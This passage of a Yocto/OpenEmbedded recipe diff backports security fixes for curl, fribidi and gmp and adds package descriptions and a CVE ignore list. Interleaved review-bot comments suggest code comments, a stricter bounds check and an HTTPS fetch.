++#define COOKIE_HASH_SIZE 63
+
+ struct CookieInfo {
+ /* linked list of cookies we know of */
+ struct Cookie *cookies[COOKIE_HASH_SIZE];
+
+- char *filename; /* file we read from/write to */
+ bool running; /* state info, for cookie adding information */
+- long numcookies; /* number of cookies in the "jar" */
++ int numcookies; /* number of cookies in the "jar" */
+ bool newsession; /* new session, discard session cookies on load */
+ int lastct; /* last creation-time used in the jar */
+ };
+diff --git a/lib/easy.c b/lib/easy.c
+index b648e80c1..cdca0fb03 100644
+--- a/lib/easy.c
++++ b/lib/easy.c
+@@ -840,9 +840,7 @@ struct Curl_easy *curl_easy_duphandle(struct Curl_easy *data)
+ if(data->cookies) {
+ /* If cookies are enabled in the parent handle, we enable them
+ in the clone as well! */
+- outcurl->cookies = Curl_cookie_init(data,
+- data->cookies->filename,
+- outcurl->cookies,
++ outcurl->cookies = Curl_cookie_init(data, NULL, outcurl->cookies,
+ data->set.cookiesession);
+ if(!outcurl->cookies)
+ goto fail;
+--
+2.39.2
+
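Review bot: Nothing in the lib/easy.c hunk says why `curl_easy_duphandle` now passes `NULL` instead of `data->cookies->filename`, and the subject "cookie: remove unnecessary struct fields" reads as a cleanup although the file carries a CVE tag. A short comment at the call, such as `/* no file name: the clone gets a cookie engine but no file to load from */`, would keep a later refactor from reintroducing the field. That wording assumes Curl_cookie_init treats a NULL file as nothing to read, which is outside the hunk. The same patch also changes `COOKIE_HASH_SIZE` from 256 to 63 and `numcookies` from `long` to `int`, which widens what has to be re-tested on a stable branch. Any format string or arithmetic that uses `numcookies` outside these hunks deserves a check.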
diff --git a/meta/recipes-support/curl/curl/CVE-2023-46218.patch b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
new file mode 100644
index 0000000000..c9677b6a84
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
@@ -0,0 +1,52 @@
+CVE: CVE-2023-46218
+Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.68.0-1ubuntu2.21.debian.tar.xz upstream https://github.com/curl/curl/commit/2b0994c29a721c91c57 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 2b0994c29a721c91c572cff7808c572a24d251eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 23 Nov 2023 08:15:47 +0100
+Subject: [PATCH] cookie: lowercase the domain names before PSL checks
+
+Reported-by: Harry Sintonen
+
+Closes #12387
+---
+ lib/cookie.c | 24 ++++++++++++++++--------
+ 1 file changed, 16 insertions(+), 8 deletions(-)
+
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -967,15 +967,23 @@ Curl_cookie_add(struct Curl_easy *data,
+ #ifdef USE_LIBPSL
+ /* Check if the domain is a Public Suffix and if yes, ignore the cookie. */
+ if(domain && co->domain && !isip(co->domain)) {
+- const psl_ctx_t *psl = Curl_psl_use(data);
+- int acceptable;
+-
+- if(psl) {
+- acceptable = psl_is_cookie_domain_acceptable(psl, domain, co->domain);
+- Curl_psl_release(data);
++ bool acceptable = FALSE;
++ char lcase[256];
++ char lcookie[256];
++ size_t dlen = strlen(domain);
++ size_t clen = strlen(co->domain);
++ if((dlen < sizeof(lcase)) && (clen < sizeof(lcookie))) {
++ const psl_ctx_t *psl = Curl_psl_use(data);
++ if(psl) {
++ /* the PSL check requires lowercase domain name and pattern */
++ Curl_strntolower(lcase, domain, dlen + 1);
++ Curl_strntolower(lcookie, co->domain, clen + 1);
++ acceptable = psl_is_cookie_domain_acceptable(psl, lcase, lcookie);
++ Curl_psl_release(data);
++ }
++ else
++ acceptable = !bad_domain(domain);
+ }
+- else
+- acceptable = !bad_domain(domain);
+
+ if(!acceptable) {
+ infof(data, "cookie '%s' dropped, domain '%s' must not "
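Review bot: In the `#ifdef USE_LIBPSL` block, a `domain` or `co->domain` of 256 bytes or more leaves `acceptable` at FALSE, so the cookie is dropped without either the PSL lookup or `bad_domain()` being consulted, and nothing in the code says this is intended. Failing closed is the safe direction for a public-suffix check, but the `infof()` that follows will report the drop with the "domain '%s' must not ..." wording, which is misleading for an over-long name. A comment above the length test would record the intent, for example `/* names too long for the lowercase buffers are rejected: acceptable stays FALSE */`. Curl_cookie_add starts and ends outside the hunk.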
diff --git a/meta/recipes-support/curl/curl/CVE-2024-2398.patch b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
new file mode 100644
index 0000000000..a3840336f0
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
@@ -0,0 +1,88 @@
+Backport of:
+
+From deca8039991886a559b67bcd6701db800a5cf764 Mon Sep 17 00:00:00 2001
+From: Stefan Eissing <stefan@eissing.org>
+Date: Wed, 6 Mar 2024 09:36:08 +0100
+Subject: [PATCH] http2: push headers better cleanup
+
+- provide common cleanup method for push headers
+
+Closes #13054
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2024-2398.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/deca8039991886a559b67bcd6701db800a5cf764]
+CVE: CVE-2024-2398
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/http2.c | 34 +++++++++++++++-------------------
+ 1 file changed, 15 insertions(+), 19 deletions(-)
+
+--- a/lib/http2.c
++++ b/lib/http2.c
+@@ -515,6 +515,15 @@ static struct Curl_easy *duphandle(struc
+ }
+
+
++static void free_push_headers(struct HTTP *stream)
++{
++ size_t i;
++ for(i = 0; i<stream->push_headers_used; i++)
++ free(stream->push_headers[i]);
++ Curl_safefree(stream->push_headers);
++ stream->push_headers_used = 0;
++}
++
+ static int push_promise(struct Curl_easy *data,
+ struct connectdata *conn,
+ const nghttp2_push_promise *frame)
+@@ -528,7 +537,6 @@ static int push_promise(struct Curl_easy
+ struct curl_pushheaders heads;
+ CURLMcode rc;
+ struct http_conn *httpc;
+- size_t i;
+ /* clone the parent */
+ struct Curl_easy *newhandle = duphandle(data);
+ if(!newhandle) {
+@@ -557,11 +565,7 @@ static int push_promise(struct Curl_easy
+ Curl_set_in_callback(data, false);
+
+ /* free the headers again */
+- for(i = 0; i<stream->push_headers_used; i++)
+- free(stream->push_headers[i]);
+- free(stream->push_headers);
+- stream->push_headers = NULL;
+- stream->push_headers_used = 0;
++ free_push_headers(stream);
+
+ if(rv) {
+ /* denied, kill off the new handle again */
+@@ -995,10 +999,10 @@ static int on_header(nghttp2_session *se
+ stream->push_headers_alloc) {
+ char **headp;
+ stream->push_headers_alloc *= 2;
+- headp = Curl_saferealloc(stream->push_headers,
+- stream->push_headers_alloc * sizeof(char *));
++ headp = realloc(stream->push_headers,
++ stream->push_headers_alloc * sizeof(char *));
+ if(!headp) {
+- stream->push_headers = NULL;
++ free_push_headers(stream);
+ return NGHTTP2_ERR_TEMPORAL_CALLBACK_FAILURE;
+ }
+ stream->push_headers = headp;
+@@ -1179,14 +1183,7 @@ void Curl_http2_done(struct Curl_easy *d
+ if(http->header_recvbuf) {
+ Curl_add_buffer_free(&http->header_recvbuf);
+ Curl_add_buffer_free(&http->trailer_recvbuf);
+- if(http->push_headers) {
+- /* if they weren't used and then freed before */
+- for(; http->push_headers_used > 0; --http->push_headers_used) {
+- free(http->push_headers[http->push_headers_used - 1]);
+- }
+- free(http->push_headers);
+- http->push_headers = NULL;
+- }
++ free_push_headers(http);
+ }
+
+ if(!httpc->h2) /* not HTTP/2 ? */
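Review bot: `free_push_headers()` clears `push_headers` and `push_headers_used` but leaves `push_headers_alloc` untouched, and in the `on_header` realloc-failure path that field has already been doubled before the helper runs. Whether the stale capacity is ever read while the array is NULL depends on allocation code in `on_header` that lies outside the hunk, so this may be harmless today. Adding `stream->push_headers_alloc = 0;` to the helper would keep the three fields consistent. The helper also deserves a short comment such as `/* free every stored push header and the array itself; a no-op when nothing was allocated */`, since `Curl_http2_done` now calls it without the former `if(http->push_headers)` guard.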
diff --git a/meta/recipes-support/curl/curl_7.69.1.bb b/meta/recipes-support/curl/curl_7.69.1.bb
index 239852db09..2f351d585a 100644
--- a/meta/recipes-support/curl/curl_7.69.1.bb
+++ b/meta/recipes-support/curl/curl_7.69.1.bb
@@ -1,4 +1,8 @@
SUMMARY = "Command line tool and library for client-side URL transfers"
+DESCRIPTION = "It uses URL syntax to transfer data to and from servers. \
+curl is a widely used because of its ability to be flexible and complete \
+complex tasks. For example, you can use curl for things like user authentication, \
+HTTP post, SSL connections, proxy support, FTP uploads, and more!"
HOMEPAGE = "http://curl.haxx.se/"
BUGTRACKER = "http://curl.haxx.se/mail/list.cgi?list=curl-tracker"
SECTION = "console/network"
@@ -9,6 +13,52 @@ SRC_URI = "https://curl.haxx.se/download/curl-${PV}.tar.bz2 \
file://0001-replace-krb5-config-with-pkg-config.patch \
file://CVE-2020-8169.patch \
file://CVE-2020-8177.patch \
+ file://CVE-2020-8231.patch \
+ file://CVE-2020-8284.patch \
+ file://CVE-2020-8285.patch \
+ file://CVE-2020-8286.patch \
+ file://CVE-2021-22876.patch \
+ file://CVE-2021-22890.patch \
+ file://CVE-2021-22898.patch \
+ file://CVE-2021-22924.patch \
+ file://CVE-2021-22925.patch \
+ file://CVE-2021-22946-pre1.patch \
+ file://CVE-2021-22946.patch \
+ file://CVE-2021-22947.patch \
+ file://CVE-2022-27776.patch \
+ file://CVE-2022-27775.patch \
+ file://CVE-2022-22576.patch \
+ file://CVE-2022-27774-1.patch \
+ file://CVE-2022-27774-2.patch \
+ file://CVE-2022-27774-3.patch \
+ file://CVE-2022-27774-4.patch \
+ file://CVE-2022-27781.patch \
+ file://CVE-2022-27782-1.patch \
+ file://CVE-2022-27782-2.patch \
+ file://CVE-2022-32206.patch \
+ file://CVE-2022-32207.patch \
+ file://CVE-2022-32208.patch \
+ file://CVE-2022-35252.patch \
+ file://CVE-2022-32221.patch \
+ file://CVE-2022-35260.patch \
+ file://CVE-2022-43552.patch \
+ file://CVE-2023-23916.patch \
+ file://CVE-2023-27534-pre1.patch \
+ file://CVE-2023-27534.patch \
+ file://CVE-2023-27538.patch \
+ file://CVE-2023-27533.patch \
+ file://CVE-2023-27535-pre1.patch \
+ file://CVE-2023-27535.patch \
+ file://CVE-2023-27536.patch \
+ file://CVE-2023-28320.patch \
+ file://CVE-2023-28320-fol1.patch \
+ file://CVE-2023-32001.patch \
+ file://CVE-2023-38545.patch \
+ file://CVE-2023-38546.patch \
+ file://CVE-2023-28321.patch \
+ file://CVE-2023-28322.patch \
+ file://CVE-2023-46218.patch \
+ file://CVE-2024-2398.patch \
"
SRC_URI[md5sum] = "ec5fc263f898a3dfef08e805f1ecca42"
@@ -16,6 +66,15 @@ SRC_URI[sha256sum] = "2ff5e5bd507adf6aa88ff4bbafd4c7af464867ffb688be93b9930717a5
# Curl has used many names over the years...
CVE_PRODUCT = "haxx:curl haxx:libcurl curl:curl curl:libcurl libcurl:libcurl daniel_stenberg:curl"
+CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926 CVE-2021-22945"
+
+# As per link https://security-tracker.debian.org/tracker/CVE-2021-22897
+# and https://ubuntu.com/security/CVE-2021-22897
+# This CVE issue affects Windows only Hence whitelisting this CVE
+CVE_CHECK_WHITELIST += "CVE-2021-22897"
+
+# This CVE reports that apple had to upgrade curl because of other already reported CVEs
+CVE_CHECK_WHITELIST += "CVE-2023-42915"
inherit autotools pkgconfig binconfig multilib_header
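Review bot: The first `CVE_CHECK_WHITELIST` line ignores CVE-2021-22922, CVE-2021-22923, CVE-2021-22926 and CVE-2021-22945 with no stated reason, while the two entries below it each carry a justification. An ignore entry without a rationale cannot be re-validated when the recipe is upgraded or its configuration changes, so each of the four should get a comment in the same form, e.g. `# CVE-2021-22922: <reason it does not apply to this build>` (placeholder; the reason is not on the page). The line also assigns with `=`, which would discard any value set earlier in parsing; `+=`, as on the following lines, avoids that if anything else contributes to the list.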
diff --git a/meta/recipes-support/db/db_5.3.28.bb b/meta/recipes-support/db/db_5.3.28.bb
index 318efcb61d..b2ae98f05c 100644
--- a/meta/recipes-support/db/db_5.3.28.bb
+++ b/meta/recipes-support/db/db_5.3.28.bb
@@ -10,11 +10,12 @@
# same system at the same time if really necessary.
SECTION = "libs"
SUMMARY = "Berkeley Database v5"
+DESCRIPTION = "Provides the foundational storage services for your application, no matter how demanding and unique your requirements may seem to be"
HOMEPAGE = "https://www.oracle.com/database/technologies/related/berkeleydb.html"
LICENSE = "Sleepycat"
RCONFLICTS_${PN} = "db3"
-CVE_PRODUCT = "oracle_berkeley_db"
+CVE_PRODUCT = "oracle_berkeley_db berkeley_db"
CVE_VERSION = "11.2.${PV}"
PR = "r1"
diff --git a/meta/recipes-support/debianutils/debianutils_4.9.1.bb b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
index 904c52780f..8603fecbd0 100644
--- a/meta/recipes-support/debianutils/debianutils_4.9.1.bb
+++ b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
@@ -1,4 +1,9 @@
SUMMARY = "Miscellaneous utilities specific to Debian"
+DESCRIPTION = "Provides a number of small utilities which are used \
+primarily by the installation scripts of Debian packages, although \
+you may use them directly. "
+HOMEPAGE = "https://packages.debian.org/sid/debianutils"
+BUGTRACKER = "https://bugs.debian.org/cgi-bin/pkgreport.cgi?pkg=debianutils;dist=unstable"
SECTION = "base"
LICENSE = "GPLv2 & SMAIL_GPL"
LIC_FILES_CHKSUM = "file://debian/copyright;md5=f01a5203d50512fc4830b4332b696a9f"
diff --git a/meta/recipes-support/diffoscope/diffoscope_136.bb b/meta/recipes-support/diffoscope/diffoscope_172.bb
index 3e3e1dfc00..b26713c47f 100644
--- a/meta/recipes-support/diffoscope/diffoscope_136.bb
+++ b/meta/recipes-support/diffoscope/diffoscope_172.bb
@@ -7,12 +7,19 @@ PYPI_PACKAGE = "diffoscope"
inherit pypi setuptools3
-SRC_URI[md5sum] = "c84d8d308a40176ba2f5dc4abdbf6f73"
-SRC_URI[sha256sum] = "0d6486d6eb6e0445ba21fee2e8bdd3a366ce786bfac98e00e5a95038b7815f15"
+SRC_URI[sha256sum] = "5ffe7f38555c6409bc7e7edc277ed77dd78641fe1306fc38d153dbbe445ddea4"
RDEPENDS_${PN} += "binutils vim squashfs-tools python3-libarchive-c python3-magic"
# Dependencies don't build for musl
COMPATIBLE_HOST_libc-musl = 'null'
+do_install_append_class-native() {
+ create_wrapper ${D}${bindir}/diffoscope \
+ MAGIC=${STAGING_DIR_NATIVE}${datadir_native}/misc/magic.mgc \
+ RPM_CONFIGDIR=${STAGING_LIBDIR_NATIVE}/rpm \
+ LD_LIBRARY_PATH=${STAGING_LIBDIR_NATIVE} \
+ RPM_ETCCONFIGDIR=${STAGING_DIR_NATIVE}
+}
+
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
index 1623285fd0..ea34e4c7a3 100644
--- a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
+++ b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
@@ -8,7 +8,7 @@ SECTION = "support"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://COPYING.txt;md5=0c977b18f0a384d03597a517d7d03e32"
-SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix"
+SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "dos2unix-(?P<pver>(\d+(\.\d+)+))"
SRCREV = "0490f0723b1a0851b17343f6164915f3474b5197"
diff --git a/meta/recipes-support/enchant/enchant2_2.2.8.bb b/meta/recipes-support/enchant/enchant2_2.2.8.bb
index 4ddbe55da5..7c624efea3 100644
--- a/meta/recipes-support/enchant/enchant2_2.2.8.bb
+++ b/meta/recipes-support/enchant/enchant2_2.2.8.bb
@@ -1,6 +1,9 @@
SUMMARY = "Enchant Spell checker API Library"
+DESCRIPTION = "A library (and command-line program) that wraps a number of \
+different spelling libraries and programs with a consistent interface."
SECTION = "libs"
HOMEPAGE = "https://abiword.github.io/enchant/"
+BUGTRACKER = "https://github.com/AbiWord/enchant/issues/"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=a916467b91076e631dd8edb7424769c7"
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
new file mode 100644
index 0000000000..8f2c2ade0e
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
@@ -0,0 +1,50 @@
+From ad3a19e6372b1e667128ed1ea2f49919884587e1 Mon Sep 17 00:00:00 2001
+From: Akira TAGOH <akira@tagoh.org>
+Date: Thu, 17 Feb 2022 17:30:12 +0900
+Subject: [PATCH] Fix the stack buffer overflow issue
+
+strlen() could returns 0. Without a conditional check for len,
+accessing S_ pointer with len - 1 may causes a stack buffer overflow.
+
+AddressSanitizer reports this like:
+==1219243==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdce043c1f at pc 0x000000403547 bp 0x7ffdce0
+43b30 sp 0x7ffdce043b28
+READ of size 1 at 0x7ffdce043c1f thread T0
+ #0 0x403546 in main ../bin/fribidi-main.c:393
+ #1 0x7f226804e58f in __libc_start_call_main (/lib64/libc.so.6+0x2d58f)
+ #2 0x7f226804e648 in __libc_start_main_impl (/lib64/libc.so.6+0x2d648)
+ #3 0x4036f4 in _start (/tmp/fribidi/build/bin/fribidi+0x4036f4)
+
+Address 0x7ffdce043c1f is located in stack of thread T0 at offset 63 in frame
+ #0 0x4022bf in main ../bin/fribidi-main.c:193
+
+ This frame has 5 object(s):
+ [32, 36) 'option_index' (line 233)
+ [48, 52) 'base' (line 386)
+ [64, 65064) 'S_' (line 375) <== Memory access at offset 63 underflows this variable
+ [65328, 130328) 'outstring' (line 385)
+ [130592, 390592) 'logical' (line 384)
+
+This fixes https://github.com/fribidi/fribidi/issues/181
+
+CVE: CVE-2022-25308
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/ad3a19e6372b1e667128ed1ea2f49919884587e1]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ bin/fribidi-main.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/bin/fribidi-main.c b/bin/fribidi-main.c
+index 3cf9fe1..3ae4fb6 100644
+--- a/bin/fribidi-main.c
++++ b/bin/fribidi-main.c
+@@ -390,7 +390,7 @@ FRIBIDI_END_IGNORE_DEPRECATIONS
+ S_[sizeof (S_) - 1] = 0;
+ len = strlen (S_);
+ /* chop */
+- if (S_[len - 1] == '\n')
++ if (len > 0 && S_[len - 1] == '\n')
+ {
+ len--;
+ S_[len] = '\0';
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
new file mode 100644
index 0000000000..0efba3d05c
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
@@ -0,0 +1,31 @@
+From f22593b82b5d1668d1997dbccd10a9c31ffea3b3 Mon Sep 17 00:00:00 2001
+From: Dov Grobgeld <dov.grobgeld@gmail.com>
+Date: Fri, 25 Mar 2022 09:09:49 +0300
+Subject: [PATCH] Protected against garbage in the CapRTL encoder
+
+CVE: CVE-2022-25309
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/f22593b82b5d1668d1997dbccd10a9c31ffea3b3]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ lib/fribidi-char-sets-cap-rtl.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/fribidi-char-sets-cap-rtl.c b/lib/fribidi-char-sets-cap-rtl.c
+index b0c0e4a..f74e010 100644
+--- a/lib/fribidi-char-sets-cap-rtl.c
++++ b/lib/fribidi-char-sets-cap-rtl.c
+@@ -232,7 +232,12 @@ fribidi_cap_rtl_to_unicode (
+ }
+ }
+ else
+- us[j++] = caprtl_to_unicode[(int) s[i]];
++ {
++ if ((int)s[i] < 0)
++ us[j++] = '?';
++ else
++ us[j++] = caprtl_to_unicode[(int) s[i]];
++ }
+ }
+
+ return j;
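Review bot: The added `(int)s[i] < 0` test in the `else` branch only catches high bytes on targets where plain `char` is signed. Where `char` is unsigned (the usual ABI on ARM and PowerPC), a byte of 0x80 or above converts to a positive int and still indexes `caprtl_to_unicode`. Whether that index is out of bounds depends on the table's length, which is not visible in the hunk. A sign-independent guard would compare the byte as `unsigned char` against the table's element count, `if ((unsigned char) s[i] >= TABLE_LEN)`, with TABLE_LEN standing for whatever the file uses for that count. The body of fribidi_cap_rtl_to_unicode starts outside the hunk.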
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
new file mode 100644
index 0000000000..d79a82d648
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
@@ -0,0 +1,30 @@
+From 175850b03e1af251d705c1d04b2b9b3c1c06e48f Mon Sep 17 00:00:00 2001
+From: Akira TAGOH <akira@tagoh.org>
+Date: Thu, 17 Feb 2022 19:06:10 +0900
+Subject: [PATCH] Fix SEGV issue in fribidi_remove_bidi_marks
+
+Escape from fribidi_remove_bidi_marks() immediately if str is null.
+
+This fixes https://github.com/fribidi/fribidi/issues/183
+
+CVE: CVE-2022-25310
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/175850b03e1af251d705c1d04b2b9b3c1c06e48f]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ lib/fribidi.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/fribidi.c b/lib/fribidi.c
+index f5da0da..70bdab2 100644
+--- a/lib/fribidi.c
++++ b/lib/fribidi.c
+@@ -74,7 +74,7 @@ fribidi_remove_bidi_marks (
+ fribidi_boolean status = false;
+
+ if UNLIKELY
+- (len == 0)
++ (len == 0 || str == NULL)
+ {
+ status = true;
+ goto out;
diff --git a/meta/recipes-support/fribidi/fribidi_1.0.9.bb b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
index 0654b07dc7..62b7d72812 100644
--- a/meta/recipes-support/fribidi/fribidi_1.0.9.bb
+++ b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
@@ -1,9 +1,18 @@
SUMMARY = "Free Implementation of the Unicode Bidirectional Algorithm"
+DESCRIPTION = "It provides utility functions to aid in the development \
+of interactive editors and widgets that implement BiDi functionality. \
+The BiDi algorithm is a prerequisite for supporting right-to-left scripts such \
+as Hebrew, Arabic, Syriac, and Thaana. "
SECTION = "libs"
+HOMEPAGE = "http://fribidi.org/"
+BUGTRACKER = "https://github.com/fribidi/fribidi/issues"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/v${PV}/${BP}.tar.xz \
+ file://CVE-2022-25308.patch \
+ file://CVE-2022-25309.patch \
+ file://CVE-2022-25310.patch \
"
SRC_URI[md5sum] = "1b767c259c3cd8e0c8496970f63c22dc"
SRC_URI[sha256sum] = "c5e47ea9026fb60da1944da9888b4e0a18854a0e2410bbfe7ad90a054d36e0c7"
diff --git a/meta/recipes-support/gdbm/gdbm_1.18.1.bb b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
index fbb1fe72d7..bfc9ee8f85 100644
--- a/meta/recipes-support/gdbm/gdbm_1.18.1.bb
+++ b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "Key/value database library with extensible hashing"
+DESCRIPTION = "Library of database functions that use extensible hashing \
+and work similar to the standard UNIX dbm. These routines are provided \
+to a programmer needing to create and manipulate a hashed database."
HOMEPAGE = "http://www.gnu.org/software/gdbm/"
SECTION = "libs"
LICENSE = "GPLv3"
diff --git a/meta/recipes-support/gmp/gmp/cve-2021-43618.patch b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
new file mode 100644
index 0000000000..095fb21eaa
--- /dev/null
+++ b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
@@ -0,0 +1,27 @@
+CVE: CVE-2021-43618
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+# HG changeset patch
+# User Marco Bodrato <bodrato@mail.dm.unipi.it>
+# Date 1634836009 -7200
+# Node ID 561a9c25298e17bb01896801ff353546c6923dbd
+# Parent e1fd9db13b475209a864577237ea4b9105b3e96e
+mpz/inp_raw.c: Avoid bit size overflows
+
+diff -r e1fd9db13b47 -r 561a9c25298e mpz/inp_raw.c
+--- a/mpz/inp_raw.c Tue Dec 22 23:49:51 2020 +0100
++++ b/mpz/inp_raw.c Thu Oct 21 19:06:49 2021 +0200
+@@ -88,8 +88,11 @@
+
+ abs_csize = ABS (csize);
+
++ if (UNLIKELY (abs_csize > ~(mp_bitcnt_t) 0 / 8))
++ return 0; /* Bit size overflows */
++
+ /* round up to a multiple of limbs */
+- abs_xsize = BITS_TO_LIMBS (abs_csize*8);
++ abs_xsize = BITS_TO_LIMBS ((mp_bitcnt_t) abs_csize * 8);
+
+ if (abs_xsize != 0)
+ {
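Review bot: The `Upstream-Status: Backport` tag at the top of the patch header names no upstream location, unlike the other backports in this commit, which give the commit URL in brackets. The changeset id is already present a few lines down (`Node ID 561a9c25298e17bb01896801ff353546c6923dbd`), so the tag could read `Upstream-Status: Backport [<upstream repository URL>/rev/561a9c25298e]`. That would let an auditor compare the carried patch with upstream without searching for it.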
diff --git a/meta/recipes-support/gmp/gmp_6.2.0.bb b/meta/recipes-support/gmp/gmp_6.2.0.bb
index a19c74fca8..d29b74f829 100644
--- a/meta/recipes-support/gmp/gmp_6.2.0.bb
+++ b/meta/recipes-support/gmp/gmp_6.2.0.bb
@@ -12,6 +12,7 @@ SRC_URI = "https://gmplib.org/download/${BPN}/${BP}${REVISION}.tar.bz2 \
file://use-includedir.patch \
file://0001-Append-the-user-provided-flags-to-the-auto-detected-.patch \
file://0001-confiure.ac-Believe-the-cflags-from-environment.patch \
+ file://cve-2021-43618.patch \
"
SRC_URI[md5sum] = "c24161e0dd44cae78cd5f67193492a21"
SRC_URI[sha256sum] = "f51c99cb114deb21a60075ffb494c1a210eb9d7cb729ed042ddb7de9534451ea"
diff --git a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
index 0defebeb15..19f32e8d1f 100644
--- a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
+++ b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
@@ -1,11 +1,15 @@
SUMMARY = "Test runner for GNOME-style installed tests"
+DESCRIPTION = "Runner provides an execution harness for GNOME installed tests. \
+These tests are useful for verifying the functionality of software as \
+installed and packaged, and complement rather than replace build-time \
+('make check') tests."
HOMEPAGE = "https://wiki.gnome.org/GnomeGoals/InstalledTests"
LICENSE = "LGPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=3bf50002aefd002f49e7bb854063f7e7 \
file://src/gnome-desktop-testing-runner.c;beginline=1;endline=20;md5=7ef3ad9da2ffcf7707dc11151fe007f4"
-SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http"
+SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http;branch=master"
SRCREV = "4decade67b29ad170fcf3de148e41695fc459f48"
DEPENDS = "glib-2.0"
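Review bot: The rewritten `SRC_URI` line keeps `protocol=http`, so the clone is fetched over an unencrypted, unauthenticated transport. `SRCREV` pins the commit, which limits what a tampered transport could substitute, but there is no reason to leave the fetch in cleartext while the line is being touched anyway. Suggested line: `SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=https;branch=master"`.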
diff --git a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
index 2c204e0245..a0af2d48dc 100644
--- a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
+++ b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
@@ -1,4 +1,4 @@
-From e7ad11cf54475e455fdb84d118e4782961698567 Mon Sep 17 00:00:00 2001
+From abc5c396aaddaef2e6811362e3e0cc0da28c2b34 Mon Sep 17 00:00:00 2001
From: Alexander Kanavin <alex.kanavin@gmail.com>
Date: Mon, 22 Jan 2018 18:00:21 +0200
Subject: [PATCH] configure.ac: use a custom value for the location of
@@ -14,10 +14,10 @@ Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/configure.ac b/configure.ac
-index 919ab31..cd58fdb 100644
+index 64cb8c6..3fe9027 100644
--- a/configure.ac
+++ b/configure.ac
-@@ -1855,7 +1855,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
+@@ -1824,7 +1824,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
AC_DEFINE_UNQUOTED(GPGTAR_NAME, "gpgtar", [The name of the gpgtar tool])
